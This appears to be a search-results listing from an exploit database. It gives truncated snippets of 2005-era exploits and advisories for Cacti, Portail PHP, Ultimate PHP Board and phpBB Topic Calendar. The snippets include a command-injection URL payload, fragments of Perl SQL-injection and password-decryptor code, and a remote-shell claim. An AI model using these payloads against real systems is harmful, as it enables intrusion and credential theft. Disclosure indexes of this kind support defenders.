13 matches found
Cacti <= 0.8.6d Remote Command Execution Exploit
No description provided by source. Note: This exploit contains backdoor shell code that is not located on this server. /str0ke !/usr/bin/perl Remote Command Execution Exploit for Cacti = 0.8.6d This exploit open a remote shell on the targets that uses Cacti TARGET HOST MUST BE A GNU/LINUX SERVER,...
Portail PHP < 1.3 - SQL Injection Exploit
No description provided by source. !/usr/bin/perl -w SQL Injection Exploit for Portail PHP 1.3 This exploit show the username of the administrator of the portal and his password crypted in MD5 Related advisory: http://www.securityfocus.com/archive/1/398728/2005-05-21/2005-05-27/0 Coded by Alberto...
FreeBSD : cacti -- multiple vulnerabilities (1cf00643-ed8a-11d9-8310-0001020eed82)
Stefan Esser reports : Wrongly implemented user input filters lead to multiple SQL Injection vulnerabilities which can lead f.e. to disclosure of the admin password hash. Wrongly implemented user input filters allows injection of user input into executed commandline. Alberto Trivero posted his...
M4DR007-07SA (security advisory): Multiple vulnerabilities in ASP Nuke 0.80
M4DR007-07SA security advisory: Multiple vulnerabilities in ASP Nuke 0.80 Published: 26 16 2005 Released: 26 16 2005 Name: ASP Nuke Affected Systems: = 0.80 Issue: Cross-Site Scripting, HTTP Response Splitting, SQL Injection Author: Alberto Trivero Vendor: http://www.aspnuke.com/ Software...
Cacti <= 0.8.6d Remote Command Execution Exploit
Exploit for unknown platform in category web applications ================================================ Cacti http://www.example.com/cacti/graphimage.php?localgraphid=validvalue&graphstart=%0acommand%0a Patch: download the last version http://www.cacti.net/downloadcacti.php Discovered and Code...
Cacti <= 0.8.6d Remote Command Execution Exploit
No description provided by source. Note: This exploit contains backdoor shell code that is not located on this server. /str0ke !/usr/bin/perl Remote Command Execution Exploit for Cacti = 0.8.6d This exploit open a remote shell on the targets that uses Cacti TARGET HOST MUST BE A GNU/LINUX SERVER,...
Cacti 0.8.6d - Remote Command Execution
Cacti 0.8.6d - Remote Command Execution Note: This exploit contains backdoor shell code that is not located on this server. /str0ke !/usr/bin/perl Remote Command Execution Exploit for Cacti http://www.example.com/cacti/graphimage.php?localgraphid=validvalue&graphstart=%0acommand%0a Patch: downloa...
UPBdecrypt.pl.txt
!/usr/bin/perl Passwords Decrypter for UPB $optf" || die "- Unable to open $optf: $!"; print RESULTS "Results for $opth\n","="x40,"\n\n"; for$in=0;$in/ && print RESULTS "Username: $1\n"; $page$in=m/^$1.?/ && print RESULTS "Crypted P...
portalSQL.pl.txt
!/usr/bin/perl -w SQL Injection Exploit for Portail PHP .? / && print "+ Username of administrator is: $1\n"; print "- Unable to retrieve username\n" if!$1; $page=m/ : .?/ && print "+ MD5 hash of password is: $1\n"; print "- Unable to retrieve hash of password\n" if!$1;...
Ultimate PHP Board <= 1.9.6 GOLD users.dat Password Decryptor
Exploit for unknown platform in category web applications ============================================================= Ultimate PHP Board = 1.9.6 GOLD users.dat Password Decryptor ============================================================= !/usr/bin/perl Passwords Decrypter for UPB = 1.9.6...
Ultimate PHP Board <= 1.9.6 GOLD users.dat Password Decryptor
No description provided by source. !/usr/bin/perl Passwords Decrypter for UPB = 1.9.6 Related advisory: http://www.securityfocus.com/archive/1/402461/30/0/threaded Discovered and Coded by Alberto Trivero Password file is located at: http://www.example.com/upb/db/users.dat /str0ke use Getopt::Std;...
Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor
Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor !/usr/bin/perl Passwords Decrypter for UPB $optf" || die "- Unable to open $optf: $!"; print RESULTS "Results for $opth\n","="x40,"\n\n"; for$in=0;$in/ && print RESULTS "Username: $1\n"; $page$in=m/...
Multiple vulnerabilities in Topic Calendar 1.0.1 for phpBB
CODEBUG Labs Advisory 8 Title: Multiple vulnerabilities in Topic Calendar 1.0.1 for phpBB Author: Alberto Trivero English Version: Alberto Trivero Product: Topic Calendar 1.0.1 Type: Multiple Vulnerabilities Web: http://www.codebug.org/ -- Software Page www.phpbb.com/phpBB/viewtopic.php?t=150857...